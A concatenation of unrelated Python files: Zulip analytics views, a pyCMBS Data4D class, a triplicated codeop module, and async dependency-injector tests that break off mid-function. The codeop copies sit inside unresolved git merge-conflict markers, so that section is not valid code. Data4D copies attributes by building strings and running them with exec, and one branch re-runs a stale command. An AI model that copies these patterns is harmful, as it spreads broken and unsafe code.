###
title = 'Desktop users'
query = '''
select
realm.domain,
client.name,
sum(count) as hits,
max(last_visit) as last_time
from zerver_useractivity ua
join zerver_client client on client.id = ua.client_id
join zerver_userprofile up on up.id = ua.user_profile_id
join zerver_realm realm on realm.id = up.realm_id
where
client.name like 'desktop%%'
group by domain, client.name
having max(last_visit) > now() - interval '2 week'
order by domain, client.name
'''
cols = [
'Domain',
'Client',
'Hits',
'Last time'
]
pages.append(get_page(query, cols, title))
###
title = 'Integrations by domain'
query = '''
select
realm.domain,
case
when query like '%%external%%' then split_part(query, '/', 5)
else client.name
end client_name,
sum(count) as hits,
max(last_visit) as last_time
from zerver_useractivity ua
join zerver_client client on client.id = ua.client_id
join zerver_userprofile up on up.id = ua.user_profile_id
join zerver_realm realm on realm.id = up.realm_id
where
(query in ('send_message_backend', '/api/v1/send_message')
and client.name not in ('Android', 'ZulipiOS')
and client.name not like 'test: Zulip%%'
)
or
query like '%%external%%'
group by domain, client_name
having max(last_visit) > now() - interval '2 week'
order by domain, client_name
'''
cols = [
'Domain',
'Client',
'Hits',
'Last time'
]
pages.append(get_page(query, cols, title))
###
title = 'Integrations by client'
query = '''
select
case
when query like '%%external%%' then split_part(query, '/', 5)
else client.name
end client_name,
realm.domain,
sum(count) as hits,
max(last_visit) as last_time
from zerver_useractivity ua
join zerver_client client on client.id = ua.client_id
join zerver_userprofile up on up.id = ua.user_profile_id
join zerver_realm realm on realm.id = up.realm_id
where
(query in ('send_message_backend', '/api/v1/send_message')
and client.name not in ('Android', 'ZulipiOS')
and client.name not like 'test: Zulip%%'
)
or
query like '%%external%%'
group by client_name, domain
having max(last_visit) > now() - interval '2 week'
order by client_name, domain
'''
cols = [
'Client',
'Domain',
'Hits',
'Last time'
]
pages.append(get_page(query, cols, title))
return pages
@zulip_internal
@has_request_variables
def get_activity(request):
duration_content, realm_minutes = user_activity_intervals()
counts_content = realm_summary_table(realm_minutes)
data = [
('Counts', counts_content),
('Durations', duration_content),
]
for page in ad_hoc_queries():
data.append((page['title'], page['content']))
title = 'Activity'
return render_to_response(
'analytics/activity.html',
dict(data=data, title=title, is_home=True),
context_instance=RequestContext(request)
)
def get_user_activity_records_for_realm(realm, is_bot):
fields = [
'user_profile__full_name',
'user_profile__email',
'query',
'client__name',
'count',
'last_visit',
]
records = UserActivity.objects.filter(
user_profile__realm__domain=realm,
user_profile__is_active=True,
user_profile__is_bot=is_bot
)
records = records.order_by("user_profile__email", "-last_visit")
records = records.select_related('user_profile', 'client').only(*fields)
return records
def get_user_activity_records_for_email(email):
fields = [
'user_profile__full_name',
'query',
'client__name',
'count',
'last_visit'
]
records = UserActivity.objects.filter(
user_profile__email=email
)
records = records.order_by("-last_visit")
records = records.select_related('user_profile', 'client').only(*fields)
return records
def raw_user_activity_table(records):
cols = [
'query',
'client',
'count',
'last_visit'
]
def row(record):
return [
record.query,
record.client.name,
record.count,
format_date_for_activity_reports(record.last_visit)
]
rows = map(row, records)
title = 'Raw Data'
return make_table(title, cols, rows)
def get_user_activity_summary(records):
summary = {}
def update(action, record):
if action not in summary:
summary[action] = dict(
count=record.count,
last_visit=record.last_visit
)
else:
summary[action]['count'] += record.count
summary[action]['last_visit'] = max(
summary[action]['last_visit'],
record.last_visit
)
if records:
summary['name'] = records[0].user_profile.full_name
for record in records:
client = record.client.name
query = record.query
update('use', record)
if client == 'API':
m = re.match('/api/.*/external/(.*)', query)
if m:
client = m.group(1)
update(client, record)
if client.startswith('desktop'):
update('desktop', record)
if client == 'website':
update('website', record)
if ('send_message' in query) or re.search('/api/.*/external/.*', query):
update('send', record)
if query in ['/json/update_pointer', '/api/v1/update_pointer']:
update('pointer', record)
update(client, record)
return summary
def format_date_for_activity_reports(date):
if date:
return date.astimezone(eastern_tz).strftime('%Y-%m-%d %H:%M')
else:
return ''
def user_activity_link(email):
url_name = 'analytics.views.get_user_activity'
url = urlresolvers.reverse(url_name, kwargs=dict(email=email))
email_link = '<a href="%s">%s</a>' % (url, email)
return mark_safe(email_link)
def realm_activity_link(realm):
url_name = 'analytics.views.get_realm_activity'
url = urlresolvers.reverse(url_name, kwargs=dict(realm=realm))
realm_link = '<a href="%s">%s</a>' % (url, realm)
return mark_safe(realm_link)
def realm_client_table(user_summaries):
exclude_keys = [
'internal',
'name',
'use',
'send',
'pointer',
'website',
'desktop',
]
rows = []
for email, user_summary in user_summaries.items():
email_link = user_activity_link(email)
name = user_summary['name']
for k, v in user_summary.items():
if k in exclude_keys:
continue
client = k
count = v['count']
last_visit = v['last_visit']
row = [
format_date_for_activity_reports(last_visit),
client,
name,
email_link,
count,
]
rows.append(row)
rows = sorted(rows, key=lambda r: r[0], reverse=True)
cols = [
'Last visit',
'Client',
'Name',
'Email',
'Count',
]
title = 'Clients'
return make_table(title, cols, rows)
def user_activity_summary_table(user_summary):
rows = []
for k, v in user_summary.items():
if k == 'name':
continue
client = k
count = v['count']
last_visit = v['last_visit']
row = [
format_date_for_activity_reports(last_visit),
client,
count,
]
rows.append(row)
rows = sorted(rows, key=lambda r: r[0], reverse=True)
cols = [
'last_visit',
'client',
'count',
]
title = 'User Activity'
return make_table(title, cols, rows)
def realm_user_summary_table(all_records, admin_emails):
user_records = {}
def by_email(record):
return record.user_profile.email
for email, records in itertools.groupby(all_records, by_email):
user_records[email] = get_user_activity_summary(list(records))
def get_last_visit(user_summary, k):
if k in user_summary:
return user_summary[k]['last_visit']
else:
return None
def get_count(user_summary, k):
if k in user_summary:
return user_summary[k]['count']
else:
return ''
def is_recent(val):
age = datetime.now(val.tzinfo) - val
return age.total_seconds() < 5 * 60
rows = []
for email, user_summary in user_records.items():
email_link = user_activity_link(email)
sent_count = get_count(user_summary, 'send')
cells = [user_summary['name'], email_link, sent_count]
row_class = ''
for field in ['use', 'send', 'pointer', 'desktop', 'ZulipiOS', 'Android']:
val = get_last_visit(user_summary, field)
if field == 'use':
if val and is_recent(val):
row_class += ' recently_active'
if email in admin_emails:
row_class += ' admin'
val = format_date_for_activity_reports(val)
cells.append(val)
row = dict(cells=cells, row_class=row_class)
rows.append(row)
def by_used_time(row):
return row['cells'][3]
rows = sorted(rows, key=by_used_time, reverse=True)
cols = [
'Name',
'Email',
'Total sent',
'Heard from',
'Message sent',
'Pointer motion',
'Desktop',
'ZulipiOS',
'Android'
]
title = 'Summary'
content = make_table(title, cols, rows, has_row_class=True)
return user_records, content
@zulip_internal
def get_realm_activity(request, realm):
data = []
all_records = {}
all_user_records = {}
try:
admins = get_realm(realm).get_admin_users()
except Realm.DoesNotExist:
return HttpResponseNotFound("Realm %s does not exist" % (realm,))
admin_emails = {admin.email for admin in admins}
for is_bot, page_title in [(False, 'Humans'), (True, 'Bots')]:
all_records = get_user_activity_records_for_realm(realm, is_bot)
all_records = list(all_records)
user_records, content = realm_user_summary_table(all_records, admin_emails)
all_user_records.update(user_records)
data += [(page_title, content)]
page_title = 'Clients'
content = realm_client_table(all_user_records)
data += [(page_title, content)]
page_title = 'History'
content = sent_messages_report(realm)
data += [(page_title, content)]
fix_name = lambda realm: realm.replace('.', '_')
realm_link = 'https://stats1.zulip.net:444/render/?from=-7days'
realm_link += '&target=stats.gauges.staging.users.active.%s.0_16hr' % (fix_name(realm),)
title = realm
return render_to_response(
'analytics/activity.html',
dict(data=data, realm_link=realm_link, title=title),
context_instance=RequestContext(request)
)
@zulip_internal
def get_user_activity(request, email):
records = get_user_activity_records_for_email(email)
data = []
user_summary = get_user_activity_summary(records)
content = user_activity_summary_table(user_summary)
data += [('Summary', content)]
content = raw_user_activity_table(records)
data += [('Info', content)]
title = email
return render_to_response(
'analytics/activity.html',
dict(data=data, title=title),
context_instance=RequestContext(request)
)
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = "Walter Sauf"
__version__ = "0.1.4"
__date__ = "2013/04/16"
__email__ = "walter.sauf@zmaw.de"
"""
This file is part of pyCMBS.
(c) 2012- Alexander Loew
For COPYING and LICENSE details, please refer to the LICENSE file
"""
"""
Data4D CLASS
class to work with the PFTs from JSBACH
The Data4D class has the Data Class as a base class.
In addition to the Class Date has the Data4D class the attributs
from_level : the number of the lowest level, starting by 0
to_level : the number of the highest level
data4D : is an array of the attribude 'data' from the Data-Class
becase all data are stored in the data4D array, the normal data attribude is deleted.
"""
#### from pylab import *
from data import Data
import matplotlib.colors as col
import matplotlib.cm as cm
from matplotlib import pyplot as plt
from cdo import *
class Data4D(Data):
#-----------------------------------------------------------------------
def read(self, shift_lon, start_time=None, stop_time=None, time_var='time', checklat=True):
cdo = Cdo()
if self.levellist == {}:
level = 0
L = cdo.showlevel(input='-selname,' +
self.varname + ' ' + self.filename)
levell = L[0].split(' ')
for k in levell:
self.levellist[int(k)] = level
level += 1
self.level = int(self.levellist.get(self.levellist.keys()[0]))
Data.read(self, shift_lon, start_time=start_time,
stop_time=stop_time, time_var=time_var, checklat=checklat)
del self.data
for k in sorted(self.levellist.keys()):
self.level = int(self.levellist[int(k)])
self.data4D.append(Data.read_netcdf(self, self.varname))
#-----------------------------------------------------------------------
def _copy_Data4D_Info_to_Data(self):
"""
copies all Data-attribut information from the Data4D type to the Data type.
@return C{Data} object
"""
d = Data(None, None)
for attr, value in self.__dict__.iteritems():
if attr != 'data4D' and attr != 'levellist':
# print " attr: " + attr + " value: "
try:
#-copy (needed for arrays)
cmd = "d." + attr + " = self." + attr + '.copy()'
exec cmd
except:
#-copy
cmd = "d." + attr + " = self." + attr
exec cmd
return d
#-----------------------------------------------------------------------
def copy(self):
"""
copy complete C{Data4D} object including all attributes
@return C{Data4D} object
"""
d = Data4D(None, None)
# ws print "copy of data4D.py"
for attr, value in self.__dict__.iteritems():
# print attr
if not attr == "data4D":
# print 'if'
try:
#-copy (needed for arrays)
cmd = "d." + attr + " = self." + attr + '.copy()'
exec cmd
# print "A: "+cmd
except:
#-copy
cmd = "d." + attr + " = self." + attr
exec cmd
# print "B: "+cmd
else:
# print 'else '+ str(self.levellist.keys())
#cmd = "d." + attr + " = self." + attr
exec cmd
for k in self.levellist.keys():
# print 'K: '+str(k)
d.data4D.append(self.data4D[self.levellist[k]].copy())
return d
#-----------------------------------------------------------------------
def getDataFromLevel(self, l):
"""
returns a Data4D level as a Data object
Parameters
----------
l : Data
level of data4D. Starting by 0:
"""
if int(l) in self.levellist.keys():
ret = self._copy_Data4D_Info_to_Data()
d = self
# print int(l)
# print self.levellist[int(l)]
# print self.levellist
ret.data = d.data4D[self.levellist[int(l)]]
return ret
else:
raise ValueError('Given Level %s not in data4D!' % str(l))
#-----------------------------------------------------------------------
def setDataFromLevel(self, da, l):
"""
saves the date from da into an data4D lavel.
The lebvel is given by parameter 'l'.
Parameters
----------
l : Data
level of Data4D. Starting by 0:
"""
if int(l) in self.levellist.keys():
d = self
d.data4D[self.levellist[int(l)]] = da.data
else:
raise ValueError('Given Level %s not in data4D!' % str(l))
#-----------------------------------------------------------------------
def mulc(self, x, copy=True):
if copy:
d = self.copy()
else:
d = self
for k in self.levellist.keys():
d.data4D[self.levellist[k]] *= x
return d
#-----------------------------------------------------------------------
def mul(self, x, copy=True):
if copy:
d = self.copy()
else:
d = self
for k in self.levellist.keys():
if hasattr(x, 'data4D'):
d.data4D[self.levellist[k]] *= x.data4D[self.levellist[k]]
else:
d.data4D[self.levellist[k]] *= x.data
# d.label = self.label + ' * ' + x.label
return d
#-----------------------------------------------------------------------
def divc(self, x, copy=True):
if copy:
d = self.copy()
else:
d = self
for k in self.levellist.keys():
d.data4D[self.levellist[k]] /= x
return d
#-----------------------------------------------------------------------
def div(self, x, copy=True):
if copy:
d = self.copy()
else:
d = self
for k in self.levellist.keys():
if hasattr(x, 'data4D'):
d.data4D[self.levellist[k]] /= x.data4D[self.levellist[k]]
else:
d.data4D[self.levellist[k]] /= x.data
return d
#-----------------------------------------------------------------------
def addc(self, x, copy=True):
if copy:
d = self.copy()
else:
d = self
for k in self.levellist.keys():
d.data4D[self.levellist[k]] += x
return d
#-----------------------------------------------------------------------
def add(self, x, copy=True):
if copy:
d = self.copy()
else:
d = self
# print "01 copy self "+str(self.data4D[0][4,0,0])+" d "+str(d.data4D[0][4,0,0])
# print "a1 copy self "+self.label+" d "+str(d.label)
# print "a1 copy self "+self.label+" d "+str(d.label)
# d.data4D[0][4,0,0] = d.data4D[0][4,0,0] + 100.
d.label = "myLabel"
# print "a2 copy self "+self.label+" d "+str(d.label)
for k in self.levellist.keys():
# print "02 copy self "+str(self.data4D[0][4,0,0])+" d
# "+str(d.data4D[0][4,0,0])
if hasattr(x, 'data4D'):
d.data4D[self.levellist[k]] += x.data4D[self.levellist[k]]
else:
d.data4D[self.levellist[k]] += x.data
# print "03 copy self "+str(self.data4D[0][4,0,0])+" d
# "+str(d.data4D[0][4,0,0])
return d
#-----------------------------------------------------------------------
def subc(self, x, copy=True):
if copy:
d = self.copy()
else:
d = self
for k in self.levellist.keys():
d.data4D[self.levellist[k]] -= x
return d
#-----------------------------------------------------------------------
def sub(self, x, copy=True):
if copy:
d = self.copy()
else:
d = self
for k in self.levellist.keys():
if hasattr(x, 'data4D'):
d.data4D[self.levellist[k]] -= x.data4D[self.levellist[k]]
else:
d.data4D[self.levellist[k]] -= x.data
return d
#-----------------------------------------------------------------------
def sum_data4D(self):
"""
summates all Data4D levels to one level
@return C{Data} object
"""
sum = self._copy_Data4D_Info_to_Data()
d = self
sum.data = 0.0
for k in self.levellist.keys():
sum.data += self.data4D[self.levellist[k]]
return sum
#-------------------------------------------------------------------------
def __init__(self, filename, varname, levellist=None, **kwargs):
"""
Data4D class
This class implements the functionality to generate Data4D objekt.
EXAMPLES
========
"""
self.levellist = {}
if not levellist is None:
level = 0
for k in levellist:
self.levellist[int(k)] = level
level += 1
self.data4D = []
Data.__init__(self, filename, varname, **kwargs)
self.mulc(self.scale_factor, copy=False)
| |
<<<<<<< HEAD
<<<<<<< HEAD
r"""Utilities to compile possibly incomplete Python source code.
This module provides two interfaces, broadly similar to the builtin
function compile(), which take program text, a filename and a 'mode'
and:
- Return code object if the command is complete and valid
- Return None if the command is incomplete
- Raise SyntaxError, ValueError or OverflowError if the command is a
syntax error (OverflowError and ValueError can be produced by
malformed literals).
Approach:
First, check if the source consists entirely of blank lines and
comments; if so, replace it with 'pass', because the built-in
parser doesn't always do the right thing for these.
Compile three times: as is, with \n, and with \n\n appended. If it
compiles as is, it's complete. If it compiles with one \n appended,
we expect more. If it doesn't compile either way, we compare the
error we get when compiling with \n or \n\n appended. If the errors
are the same, the code is broken. But if the errors are different, we
expect more. Not intuitive; not even guaranteed to hold in future
releases; but this matches the compiler's behavior from Python 1.4
through 2.2, at least.
Caveat:
It is possible (but not likely) that the parser stops parsing with a
successful outcome before reaching the end of the source; in this
case, trailing symbols may be ignored instead of causing an error.
For example, a backslash followed by two newlines may be followed by
arbitrary garbage. This will be fixed once the API for the parser is
better.
The two interfaces are:
compile_command(source, filename, symbol):
Compiles a single command in the manner described above.
CommandCompiler():
Instances of this class have __call__ methods identical in
signature to compile_command; the difference is that if the
instance compiles program text containing a __future__ statement,
the instance 'remembers' and compiles all subsequent program texts
with the statement in force.
The module also provides another class:
Compile():
Instances of this class act like the built-in function compile,
but with 'memory' in the sense described above.
"""
import __future__
_features = [getattr(__future__, fname)
for fname in __future__.all_feature_names]
__all__ = ["compile_command", "Compile", "CommandCompiler"]
PyCF_DONT_IMPLY_DEDENT = 0x200 # Matches pythonrun.h
def _maybe_compile(compiler, source, filename, symbol):
# Check for source consisting of only blank lines and comments
for line in source.split("\n"):
line = line.strip()
if line and line[0] != '#':
break # Leave it alone
else:
if symbol != "eval":
source = "pass" # Replace it with a 'pass' statement
err = err1 = err2 = None
code = code1 = code2 = None
try:
code = compiler(source, filename, symbol)
except SyntaxError as err:
pass
try:
code1 = compiler(source + "\n", filename, symbol)
except SyntaxError as e:
err1 = e
try:
code2 = compiler(source + "\n\n", filename, symbol)
except SyntaxError as e:
err2 = e
if code:
return code
if not code1 and repr(err1) == repr(err2):
raise err1
def _compile(source, filename, symbol):
return compile(source, filename, symbol, PyCF_DONT_IMPLY_DEDENT)
def compile_command(source, filename="<input>", symbol="single"):
r"""Compile a command and determine whether it is incomplete.
Arguments:
source -- the source string; may contain \n characters
filename -- optional filename from which source was read; default
"<input>"
symbol -- optional grammar start symbol; "single" (default) or "eval"
Return value / exceptions raised:
- Return a code object if the command is complete and valid
- Return None if the command is incomplete
- Raise SyntaxError, ValueError or OverflowError if the command is a
syntax error (OverflowError and ValueError can be produced by
malformed literals).
"""
return _maybe_compile(_compile, source, filename, symbol)
class Compile:
"""Instances of this class behave much like the built-in compile
function, but if one is used to compile text containing a future
statement, it "remembers" and compiles all subsequent program texts
with the statement in force."""
def __init__(self):
self.flags = PyCF_DONT_IMPLY_DEDENT
def __call__(self, source, filename, symbol):
codeob = compile(source, filename, symbol, self.flags, 1)
for feature in _features:
if codeob.co_flags & feature.compiler_flag:
self.flags |= feature.compiler_flag
return codeob
class CommandCompiler:
"""Instances of this class have __call__ methods identical in
signature to compile_command; the difference is that if the
instance compiles program text containing a __future__ statement,
the instance 'remembers' and compiles all subsequent program texts
with the statement in force."""
def __init__(self,):
self.compiler = Compile()
def __call__(self, source, filename="<input>", symbol="single"):
r"""Compile a command and determine whether it is incomplete.
Arguments:
source -- the source string; may contain \n characters
filename -- optional filename from which source was read;
default "<input>"
symbol -- optional grammar start symbol; "single" (default) or
"eval"
Return value / exceptions raised:
- Return a code object if the command is complete and valid
- Return None if the command is incomplete
- Raise SyntaxError, ValueError or OverflowError if the command is a
syntax error (OverflowError and ValueError can be produced by
malformed literals).
"""
return _maybe_compile(self.compiler, source, filename, symbol)
=======
r"""Utilities to compile possibly incomplete Python source code.
This module provides two interfaces, broadly similar to the builtin
function compile(), which take program text, a filename and a 'mode'
and:
- Return code object if the command is complete and valid
- Return None if the command is incomplete
- Raise SyntaxError, ValueError or OverflowError if the command is a
syntax error (OverflowError and ValueError can be produced by
malformed literals).
Approach:
First, check if the source consists entirely of blank lines and
comments; if so, replace it with 'pass', because the built-in
parser doesn't always do the right thing for these.
Compile three times: as is, with \n, and with \n\n appended. If it
compiles as is, it's complete. If it compiles with one \n appended,
we expect more. If it doesn't compile either way, we compare the
error we get when compiling with \n or \n\n appended. If the errors
are the same, the code is broken. But if the errors are different, we
expect more. Not intuitive; not even guaranteed to hold in future
releases; but this matches the compiler's behavior from Python 1.4
through 2.2, at least.
Caveat:
It is possible (but not likely) that the parser stops parsing with a
successful outcome before reaching the end of the source; in this
case, trailing symbols may be ignored instead of causing an error.
For example, a backslash followed by two newlines may be followed by
arbitrary garbage. This will be fixed once the API for the parser is
better.
The two interfaces are:
compile_command(source, filename, symbol):
Compiles a single command in the manner described above.
CommandCompiler():
Instances of this class have __call__ methods identical in
signature to compile_command; the difference is that if the
instance compiles program text containing a __future__ statement,
the instance 'remembers' and compiles all subsequent program texts
with the statement in force.
The module also provides another class:
Compile():
Instances of this class act like the built-in function compile,
but with 'memory' in the sense described above.
"""
import __future__
_features = [getattr(__future__, fname)
for fname in __future__.all_feature_names]
__all__ = ["compile_command", "Compile", "CommandCompiler"]
PyCF_DONT_IMPLY_DEDENT = 0x200 # Matches pythonrun.h
def _maybe_compile(compiler, source, filename, symbol):
# Check for source consisting of only blank lines and comments
for line in source.split("\n"):
line = line.strip()
if line and line[0] != '#':
break # Leave it alone
else:
if symbol != "eval":
source = "pass" # Replace it with a 'pass' statement
err = err1 = err2 = None
code = code1 = code2 = None
try:
code = compiler(source, filename, symbol)
except SyntaxError as err:
pass
try:
code1 = compiler(source + "\n", filename, symbol)
except SyntaxError as e:
err1 = e
try:
code2 = compiler(source + "\n\n", filename, symbol)
except SyntaxError as e:
err2 = e
if code:
return code
if not code1 and repr(err1) == repr(err2):
raise err1
def _compile(source, filename, symbol):
return compile(source, filename, symbol, PyCF_DONT_IMPLY_DEDENT)
def compile_command(source, filename="<input>", symbol="single"):
r"""Compile a command and determine whether it is incomplete.
Arguments:
source -- the source string; may contain \n characters
filename -- optional filename from which source was read; default
"<input>"
symbol -- optional grammar start symbol; "single" (default) or "eval"
Return value / exceptions raised:
- Return a code object if the command is complete and valid
- Return None if the command is incomplete
- Raise SyntaxError, ValueError or OverflowError if the command is a
syntax error (OverflowError and ValueError can be produced by
malformed literals).
"""
return _maybe_compile(_compile, source, filename, symbol)
class Compile:
"""Instances of this class behave much like the built-in compile
function, but if one is used to compile text containing a future
statement, it "remembers" and compiles all subsequent program texts
with the statement in force."""
def __init__(self):
self.flags = PyCF_DONT_IMPLY_DEDENT
def __call__(self, source, filename, symbol):
codeob = compile(source, filename, symbol, self.flags, 1)
for feature in _features:
if codeob.co_flags & feature.compiler_flag:
self.flags |= feature.compiler_flag
return codeob
class CommandCompiler:
"""Instances of this class have __call__ methods identical in
signature to compile_command; the difference is that if the
instance compiles program text containing a __future__ statement,
the instance 'remembers' and compiles all subsequent program texts
with the statement in force."""
def __init__(self,):
self.compiler = Compile()
def __call__(self, source, filename="<input>", symbol="single"):
r"""Compile a command and determine whether it is incomplete.
Arguments:
source -- the source string; may contain \n characters
filename -- optional filename from which source was read;
default "<input>"
symbol -- optional grammar start symbol; "single" (default) or
"eval"
Return value / exceptions raised:
- Return a code object if the command is complete and valid
- Return None if the command is incomplete
- Raise SyntaxError, ValueError or OverflowError if the command is a
syntax error (OverflowError and ValueError can be produced by
malformed literals).
"""
return _maybe_compile(self.compiler, source, filename, symbol)
>>>>>>> b875702c9c06ab5012e52ff4337439b03918f453
=======
r"""Utilities to compile possibly incomplete Python source code.
This module provides two interfaces, broadly similar to the builtin
function compile(), which take program text, a filename and a 'mode'
and:
- Return code object if the command is complete and valid
- Return None if the command is incomplete
- Raise SyntaxError, ValueError or OverflowError if the command is a
syntax error (OverflowError and ValueError can be produced by
malformed literals).
Approach:
First, check if the source consists entirely of blank lines and
comments; if so, replace it with 'pass', because the built-in
parser doesn't always do the right thing for these.
Compile three times: as is, with \n, and with \n\n appended. If it
compiles as is, it's complete. If it compiles with one \n appended,
we expect more. If it doesn't compile either way, we compare the
error we get when compiling with \n or \n\n appended. If the errors
are the same, the code is broken. But if the errors are different, we
expect more. Not intuitive; not even guaranteed to hold in future
releases; but this matches the compiler's behavior from Python 1.4
through 2.2, at least.
Caveat:
It is possible (but not likely) that the parser stops parsing with a
successful outcome before reaching the end of the source; in this
case, trailing symbols may be ignored instead of causing an error.
For example, a backslash followed by two newlines may be followed by
arbitrary garbage. This will be fixed once the API for the parser is
better.
The two interfaces are:
compile_command(source, filename, symbol):
Compiles a single command in the manner described above.
CommandCompiler():
Instances of this class have __call__ methods identical in
signature to compile_command; the difference is that if the
instance compiles program text containing a __future__ statement,
the instance 'remembers' and compiles all subsequent program texts
with the statement in force.
The module also provides another class:
Compile():
Instances of this class act like the built-in function compile,
but with 'memory' in the sense described above.
"""
import __future__
_features = [getattr(__future__, fname)
for fname in __future__.all_feature_names]
__all__ = ["compile_command", "Compile", "CommandCompiler"]
PyCF_DONT_IMPLY_DEDENT = 0x200 # Matches pythonrun.h
def _maybe_compile(compiler, source, filename, symbol):
# Check for source consisting of only blank lines and comments
for line in source.split("\n"):
line = line.strip()
if line and line[0] != '#':
break # Leave it alone
else:
if symbol != "eval":
source = "pass" # Replace it with a 'pass' statement
err = err1 = err2 = None
code = code1 = code2 = None
try:
code = compiler(source, filename, symbol)
except SyntaxError as err:
pass
try:
code1 = compiler(source + "\n", filename, symbol)
except SyntaxError as e:
err1 = e
try:
code2 = compiler(source + "\n\n", filename, symbol)
except SyntaxError as e:
err2 = e
if code:
return code
if not code1 and repr(err1) == repr(err2):
raise err1
def _compile(source, filename, symbol):
return compile(source, filename, symbol, PyCF_DONT_IMPLY_DEDENT)
def compile_command(source, filename="<input>", symbol="single"):
r"""Compile a command and determine whether it is incomplete.
Arguments:
source -- the source string; may contain \n characters
filename -- optional filename from which source was read; default
"<input>"
symbol -- optional grammar start symbol; "single" (default) or "eval"
Return value / exceptions raised:
- Return a code object if the command is complete and valid
- Return None if the command is incomplete
- Raise SyntaxError, ValueError or OverflowError if the command is a
syntax error (OverflowError and ValueError can be produced by
malformed literals).
"""
return _maybe_compile(_compile, source, filename, symbol)
class Compile:
"""Instances of this class behave much like the built-in compile
function, but if one is used to compile text containing a future
statement, it "remembers" and compiles all subsequent program texts
with the statement in force."""
def __init__(self):
self.flags = PyCF_DONT_IMPLY_DEDENT
def __call__(self, source, filename, symbol):
codeob = compile(source, filename, symbol, self.flags, 1)
for feature in _features:
if codeob.co_flags & feature.compiler_flag:
self.flags |= feature.compiler_flag
return codeob
class CommandCompiler:
"""Instances of this class have __call__ methods identical in
signature to compile_command; the difference is that if the
instance compiles program text containing a __future__ statement,
the instance 'remembers' and compiles all subsequent program texts
with the statement in force."""
def __init__(self,):
self.compiler = Compile()
def __call__(self, source, filename="<input>", symbol="single"):
r"""Compile a command and determine whether it is incomplete.
Arguments:
source -- the source string; may contain \n characters
filename -- optional filename from which source was read;
default "<input>"
symbol -- optional grammar start symbol; "single" (default) or
"eval"
Return value / exceptions raised:
- Return a code object if the command is complete and valid
- Return None if the command is incomplete
- Raise SyntaxError, ValueError or OverflowError if the command is a
syntax error (OverflowError and ValueError can be produced by
malformed literals).
"""
return _maybe_compile(self.compiler, source, filename, symbol)
>>>>>>> b875702c9c06ab5012e52ff4337439b03918f453
| |
"""Factory provider async mode tests."""
import asyncio
from dependency_injector import containers, providers
from pytest import mark, raises
from .common import RESOURCE1, RESOURCE2, Client, Service, BaseContainer, Container, init_resource
@mark.asyncio
async def test_args_injection():
class ContainerWithArgs(BaseContainer):
client = providers.Factory(
Client,
BaseContainer.resource1,
BaseContainer.resource2,
)
service = providers.Factory(
Service,
client,
)
container = ContainerWithArgs()
client1 = await container.client()
client2 = await container.client()
assert isinstance(client1, Client)
assert client1.resource1 is RESOURCE1
assert client1.resource2 is RESOURCE2
assert isinstance(client2, Client)
assert client2.resource1 is RESOURCE1
assert client2.resource2 is RESOURCE2
service1 = await container.service()
service2 = await container.service()
assert isinstance(service1, Service)
assert isinstance(service1.client, Client)
assert service1.client.resource1 is RESOURCE1
assert service1.client.resource2 is RESOURCE2
assert isinstance(service2, Service)
assert isinstance(service2.client, Client)
assert service2.client.resource1 is RESOURCE1
assert service2.client.resource2 is RESOURCE2
assert service1.client is not service2.client
@mark.asyncio
async def test_kwargs_injection():
class ContainerWithKwArgs(Container):
...
container = ContainerWithKwArgs()
client1 = await container.client()
client2 = await container.client()
assert isinstance(client1, Client)
assert client1.resource1 is RESOURCE1
assert client1.resource2 is RESOURCE2
assert isinstance(client2, Client)
assert client2.resource1 is RESOURCE1
assert client2.resource2 is RESOURCE2
service1 = await container.service()
service2 = await container.service()
assert isinstance(service1, Service)
assert isinstance(service1.client, Client)
assert service1.client.resource1 is RESOURCE1
assert service1.client.resource2 is RESOURCE2
assert isinstance(service2, Service)
assert isinstance(service2.client, Client)
assert service2.client.resource1 is RESOURCE1
assert service2.client.resource2 is RESOURCE2
assert service1.client is not service2.client
@mark.asyncio
async def test_context_kwargs_injection():
resource2_extra = object()
container = Container()
client1 = await container.client(resource2=resource2_extra)
client2 = await container.client(resource2=resource2_extra)
assert isinstance(client1, Client)
assert client1.resource1 is RESOURCE1
assert client1.resource2 is resource2_extra
assert isinstance(client2, Client)
assert client2.resource1 is RESOURCE1
assert client2.resource2 is resource2_extra
@mark.asyncio
async def test_args_kwargs_injection():
class ContainerWithArgsAndKwArgs(BaseContainer):
client = providers.Factory(
Client,
BaseContainer.resource1,
resource2=BaseContainer.resource2,
)
service = providers.Factory(
Service,
client=client,
)
container = ContainerWithArgsAndKwArgs()
client1 = await container.client()
client2 = await container.client()
assert isinstance(client1, Client)
assert client1.resource1 is RESOURCE1
assert client1.resource2 is RESOURCE2
assert isinstance(client2, Client)
assert client2.resource1 is RESOURCE1
assert client2.resource2 is RESOURCE2
service1 = await container.service()
service2 = await container.service()
assert isinstance(service1, Service)
assert isinstance(service1.client, Client)
assert service1.client.resource1 is RESOURCE1
assert service1.client.resource2 is RESOURCE2
assert isinstance(service2, Service)
assert isinstance(service2.client, Client)
assert service2.client.resource1 is RESOURCE1
assert service2.client.resource2 is RESOURCE2
assert service1.client is not service2.client
@mark.asyncio
async def test_async_provider_with_async_injections():
# See: https://github.com/ets-labs/python-dependency-injector/issues/368
async def async_client_provider():
return {"client": "OK"}
async def async_service(client):
return {"service": "OK", "client": client}
class Container(containers.DeclarativeContainer):
client = providers.Factory(async_client_provider)
service = providers.Factory(async_service, client=client)
container = Container()
service = await container.service()
assert service == {"service": "OK", "client": {"client": "OK"}}
@mark.asyncio
async def test_with_awaitable_injection():
class SomeResource:
def __await__(self):
raise RuntimeError("Should never happen")
async def init_resource():
yield SomeResource()
class Service:
def __init__(self, resource) -> None:
self.resource = resource
class Container(containers.DeclarativeContainer):
resource = providers.Resource(init_resource)
service = providers.Factory(Service, resource=resource)
container = Container()
assert isinstance(container.service(), asyncio.Future)
assert isinstance(container.resource(), asyncio.Future)
resource = await container.resource()
service = await container.service()
assert isinstance(resource, SomeResource)
assert isinstance(service.resource, SomeResource)
assert service.resource is resource
@mark.asyncio
async def test_with_awaitable_injection_and_with_init_resources_call():
class SomeResource:
def __await__(self):
raise RuntimeError("Should never happen")
async def init_resource():
yield SomeResource()
class Service:
def __init__(self, resource) -> None:
self.resource = resource
class Container(containers.DeclarativeContainer):
resource = providers.Resource(init_resource)
service = providers.Factory(Service, resource=resource)
container = Container()
await container.init_resources()
assert isinstance(container.service(), asyncio.Future)
assert isinstance(container.resource(), asyncio.Future)
resource = await container.resource()
service = await container.service()
assert isinstance(resource, SomeResource)
assert isinstance(service.resource, SomeResource)
assert service.resource is resource
@mark.asyncio
async def test_injection_error():
